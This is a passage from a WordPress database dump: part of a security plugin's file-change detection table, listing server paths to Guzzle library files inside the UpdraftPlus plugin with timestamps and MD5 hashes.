hp\":{\"d\":1545638167,\"h\":\"d335f9d4bd310ef8389e2ff27c6f8f2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/CallbackBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"0a2fe568fe891ef304aeff3ef105e6d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/BackoffPlugin.php\":{\"d\":1545638167,\"h\":\"ad52ca528590cd94259c1892a8a9b6fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/composer.json\":{\"d\":1545638167,\"h\":\"247b1492c94122205f0b4bd41cf182ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/AbstractBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"07ee263d5fe87295e8d5ecf532b4e6c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/ConstantBackoffStrategy.php\":{\"d\":1545638167,\"h\":\"38485d972e1fcc876e22d092dfde7f39\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Backoff\\/BackoffLogger.php\":{\"d\":1545638167,\"h\":\"2e9be2da8552ebc96075444c48b950a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Mock\\/MockPlugin.php\":{\"d\":1545638167,\"h\":\"7ebcfc53353ebe2c6f562ecfa16c65cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Mock\\/composer.json\":{\"d\":1545638167,\"h\":\"026896d99e178b39faa2ffa1e8cd6cff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/ErrorResponse\\/Exception\\/ErrorResponseException.php\":{\"d\":1545638167,\"h\":\"f41fd239940b8a9743175aa7fcb667b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/ErrorResponse\\/ErrorResponsePlugin.php\":{\"d\":1545638167,\"h\":\"45bfc917117a7bf3383b6aa4c91a61d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/ErrorResponse\\/ErrorResponseExceptionInterface.php\":{\"d\":1545638167,\"h\":\"e5139e14a9ce13f3263366a33d672d0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/ErrorResponse\\/composer.json\":{\"d\":1545638167,\"h\":\"249d31fa1f79ff526db204d0d5d471ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/DefaultRevalidation.php\":{\"d\":1545638167,\"h\":\"d0e2a9a9806ddafe5079ac53dcd7e105\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/DefaultCanCacheStrategy.php\":{\"d\":1545638167,\"h\":\"72dc9cba472369e097053dc3b62fa83c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/SkipRevalidation.php\":{\"d\":1545638167,\"h\":\"b311c417b3f64d396190e2279bc9ccf0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/CacheKeyProviderInterface.php\":{\"d\":1545638167,\"h\":\"b3615e71ca2d35d1455a4399cdc95241\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/CacheStorageInterface.php\":{\"d\":1545638167,\"h\":\"d65ee0463cb9a70b29e4d2bfd59c146c\"}}','2019-01-10 03:50:35');
INSERT INTO `wpdp_itsec_distributed_storage` (`storage_id`, `storage_group`, `storage_key`, `storage_chunk`, `storage_data`, `storage_updated`) VALUES (243,'file-list','files',1,'{\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/DenyRevalidation.php\":{\"d\":1545638167,\"h\":\"0fd0df77357918d89dd1ef77a25d6267\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/DefaultCacheKeyProvider.php\":{\"d\":1545638167,\"h\":\"1e89b5a4015f65e399a9cdae2bc2f205\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/CallbackCanCacheStrategy.php\":{\"d\":1545638167,\"h\":\"262f7b68f93486affbcc78e8eb850b32\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/CanCacheStrategyInterface.php\":{\"d\":1545638167,\"h\":\"739959b1f128d105e3587788d6cb4b37\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/RevalidationInterface.php\":{\"d\":1545638167,\"h\":\"29ffe4f945e9e554514675e9b7e8dec0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/composer.json\":{\"d\":1545638167,\"h\":\"6ca72a338645c03e11e8c713f999ab0c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/DefaultCacheStorage.php\":{\"d\":1545638167,\"h\":\"15afd0707ee4945c94d727f061636c92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cache\\/CachePlugin.php\":{\"d\":1545638167,\"h\":\"3b10308c4b3d8732f26740b2cd8dc0ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cookie\\/CookieJar\\/CookieJarInterface.php\":{\"d\":1545638167,\"h\":\"27581b77c7c53c684a4c98041dda8f14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cookie\\/CookieJar\\/FileCookieJar.php\":{\"d\":1545638167,\"h\":\"c02f91c6d1d63e21b9bf1da54c47dee0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cookie\\/CookieJar\\/ArrayCookieJar.php\":{\"d\":1545638167,\"h\":\"ab8c990c67f2943b17c3351f4a4463cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cookie\\/Exception\\/InvalidCookieException.php\":{\"d\":1545638167,\"h\":\"d4ecb86a7aa26d8016234992720a79d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cookie\\/Cookie.php\":{\"d\":1545638167,\"h\":\"9df7a6a80e3261433fca1ed10d66716e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cookie\\/composer.json\":{\"d\":1545638167,\"h\":\"4d6750ac79b688522515923a50ce0d61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Cookie\\/CookiePlugin.php\":{\"d\":1545638167,\"h\":\"5b742edeb19bc6b3eb7590da7538ba7b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Log\\/LogPlugin.php\":{\"d\":1545638167,\"h\":\"edd07bde284119ac2c64a1fbe031fe42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/Log\\/composer.json\":{\"d\":1545638167,\"h\":\"e99c07f536491f30241436c8f3be6dd4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/History\\/HistoryPlugin.php\":{\"d\":1545638167,\"h\":\"a96548ca730dc3c30f4fd55269ab9366\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/History\\/composer.json\":{\"d\":1545638167,\"h\":\"ae1b3721cd2c338d23d724328f8bb660\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Plugin\\/composer.json\":{\"d\":1545638167,\"h\":\"729b0b3afb7b1779695128622ad1e0e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Exception\\/UnexpectedValueException.php\":{\"d\":1545638167,\"h\":\"2182332c538ad9279f1cb31ebf8cec90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Exception\\/RuntimeException.php\":{\"d\":1545638167,\"h\":\"505f3a2971d80715a8601f7bb8139023\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Exception\\/InvalidArgumentException.php\":{\"d\":1545638167,\"h\":\"e176a3bfbc46ad0bcf8cc53a70ad2660\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Exception\\/GuzzleException.php\":{\"d\":1545638167,\"h\":\"a59974564cb5886db0906d38622d7b65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Exception\\/BadMethodCallException.php\":{\"d\":1545638167,\"h\":\"98140817d5204df2df8c758eb52e3ca2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Exception\\/ExceptionCollection.php\":{\"d\":1545638167,\"h\":\"20376f2d9d97ca269c68c907cb523d8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/HasDispatcherInterface.php\":{\"d\":1545638167,\"h\":\"efdba8306b7e0c6c04a23c4a3495e9bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/ToArrayInterface.php\":{\"d\":1545638167,\"h\":\"5466584f27e38712cd08d8e6309b8e78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Collection.php\":{\"d\":1545638167,\"h\":\"bdf612b12448bab74c6a90dbdb20095b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/FromConfigInterface.php\":{\"d\":1545638167,\"h\":\"a23e030b62590950884856109219c7f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Version.php\":{\"d\":1545638167,\"h\":\"009fed1435a5a5b13b5af957b7a69597\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/AbstractHasDispatcher.php\":{\"d\":1545638167,\"h\":\"4e0c67da62cd3cbe82b167f1855bff8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/Event.php\":{\"d\":1545638167,\"h\":\"d239258d838e0928c2b211ab9f0f0bad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Common\\/composer.json\":{\"d\":1545638167,\"h\":\"7f5f1e00aedc790bd43eb7d465b76715\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Iterator\\/AppendIterator.php\":{\"d\":1545638167,\"h\":\"d17ed123efb05b686f44c2eed7d3c4fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Iterator\\/README.md\":{\"d\":1545638167,\"h\":\"0df50abbcb591eaebb9781298c58e60f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Iterator\\/FilterIterator.php\":{\"d\":1545638167,\"h\":\"ed7e0d5590d718f246627b7f6949cba6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Iterator\\/MapIterator.php\":{\"d\":1545638167,\"h\":\"7d28a4b22f442e13b6874f55746b28e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Iterator\\/ChunkedIterator.php\":{\"d\":1545638167,\"h\":\"8cdd7e82a00b9a01136a8f056db18f64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Iterator\\/MethodProxyIterator.php\":{\"d\":1545638167,\"h\":\"4518ead4f857bd9721b1226068f7eb32\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Iterator\\/composer.json\":{\"d\":1545638167,\"h\":\"edae4ef059a3b966ea2d26d017c17db1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/CouldNotRewindStreamException.php\":{\"d\":1545638167,\"h\":\"08075c1d0711249e1f0674d86b57d2ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/RequestException.php\":{\"d\":1545638167,\"h\":\"e5f816167d92abea64ee09a5be87fe94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/BadResponseException.php\":{\"d\":1545638167,\"h\":\"2e358b13ef147dd6b226366a28860c7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/ServerErrorResponseException.php\":{\"d\":1545638167,\"h\":\"fe2621a64b89853c555a97ceffca9b08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/TooManyRedirectsException.php\":{\"d\":1545638167,\"h\":\"9c530bbf82d46c8014ede984fbc308e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/HttpException.php\":{\"d\":1545638167,\"h\":\"f78259ea006cf165d4848a312c827d0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/MultiTransferException.php\":{\"d\":1545638167,\"h\":\"72967b8cba5f64f9e05dd8a3a609546f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/ClientErrorResponseException.php\":{\"d\":1545638167,\"h\":\"13cab04cce406a1b0afcfea86ef7031c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Exception\\/CurlException.php\":{\"d\":1545638167,\"h\":\"d42f19fc1b034f410149e6ce97d5c750\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/QueryAggregator\\/CommaAggregator.php\":{\"d\":1545638167,\"h\":\"67ceee8d6a476d2a66594512aaa85c54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/QueryAggregator\\/DuplicateAggregator.php\":{\"d\":1545638167,\"h\":\"065d2f19bf0670cbe63d7d7164093b9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/QueryAggregator\\/PhpAggregator.php\":{\"d\":1545638167,\"h\":\"819504c086b326dbe1ea261c1d94344b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/QueryAggregator\\/QueryAggregatorInterface.php\":{\"d\":1545638167,\"h\":\"0bad1c6e1af16c2d634e58e5cb272a37\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Curl\\/CurlVersion.php\":{\"d\":1545638167,\"h\":\"7857dd20077df5870f74975d2d85e89f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Curl\\/RequestMediator.php\":{\"d\":1545638167,\"h\":\"0d01e2e18ff502516c5724a995140cd2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Curl\\/CurlMulti.php\":{\"d\":1545638167,\"h\":\"25d711e11d0278715abd6c5aee3c3f73\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Curl\\/CurlHandle.php\":{\"d\":1545638167,\"h\":\"4c806cf712385f36242d0948c4f78567\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Curl\\/CurlMultiInterface.php\":{\"d\":1545638167,\"h\":\"ba75ac02d77e97f76938e59e34596b43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Curl\\/CurlMultiProxy.php\":{\"d\":1545638167,\"h\":\"e6da8aaf1649bc5f960dca7457fb3089\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Header\\/HeaderInterface.php\":{\"d\":1545638167,\"h\":\"57719abc7b9e3a8c7c65b826a69a4df9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Header\\/Link.php\":{\"d\":1545638167,\"h\":\"b65c1fa22f1f80185d6443488c6f2db2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Header\\/HeaderFactoryInterface.php\":{\"d\":1545638167,\"h\":\"e82845c9bf276a9a2b012e54927dd6c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Header\\/CacheControl.php\":{\"d\":1545638167,\"h\":\"f5025f2ec81740068b61c37014b20c94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Header\\/HeaderFactory.php\":{\"d\":1545638167,\"h\":\"5a039da3a9ae34fbdba128ca675ba6e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Header\\/HeaderCollection.php\":{\"d\":1545638167,\"h\":\"ca52d21c4730c5086e0a14af790a1b68\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Request.php\":{\"d\":1545638167,\"h\":\"1c8bb01dec07c3a6592d5bca7e208ead\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Header.php\":{\"d\":1545638167,\"h\":\"a1e0ae834c7a2ab486ed05b9c542db67\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/PostFile.php\":{\"d\":1545638167,\"h\":\"7dfb1139d6f59e8cd91203d8f66d5ad9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/AbstractMessage.php\":{\"d\":1545638167,\"h\":\"b6b1aa0e6f9e5392b4164f17a504198a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/Response.php\":{\"d\":1545638167,\"h\":\"6cc91809942792439b1d95d9bdd2e404\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/RequestFactory.php\":{\"d\":1545638167,\"h\":\"103b8f37ac3a87afc7908f590ac7cd2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/PostFileInterface.php\":{\"d\":1545638167,\"h\":\"20adf5af26e9cabe000e9222fbaa64cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/RequestFactoryInterface.php\":{\"d\":1545638167,\"h\":\"076e8c936861a6aaf2e2a2772ac6158b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/EntityEnclosingRequestInterface.php\":{\"d\":1545638167,\"h\":\"74189c9d4edcd2f6dbc04a53c538a8ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/EntityEnclosingRequest.php\":{\"d\":1545638167,\"h\":\"5bea48d8dea5d8e430da038c69cbd335\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/MessageInterface.php\":{\"d\":1545638167,\"h\":\"b2806bc032b6960b6251b82dd23f61fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Message\\/RequestInterface.php\":{\"d\":1545638167,\"h\":\"e643c7a168461ff20fad2e83b8b94960\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/Resources\\/cacert.pem\":{\"d\":1545638167,\"h\":\"6c81b1339b320190689e4c2d594ca67f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/AbstractEntityBodyDecorator.php\":{\"d\":1545638167,\"h\":\"36d4a68be72393686cdc9e9173adbfd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/guzzle\\/guzzle\\/src\\/Guzzle\\/Http\\/ReadLimitEntityBody.php\":{\"d\":1545638167,\"h\":\"732c738571d49fd400dfad96e5623fc2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plu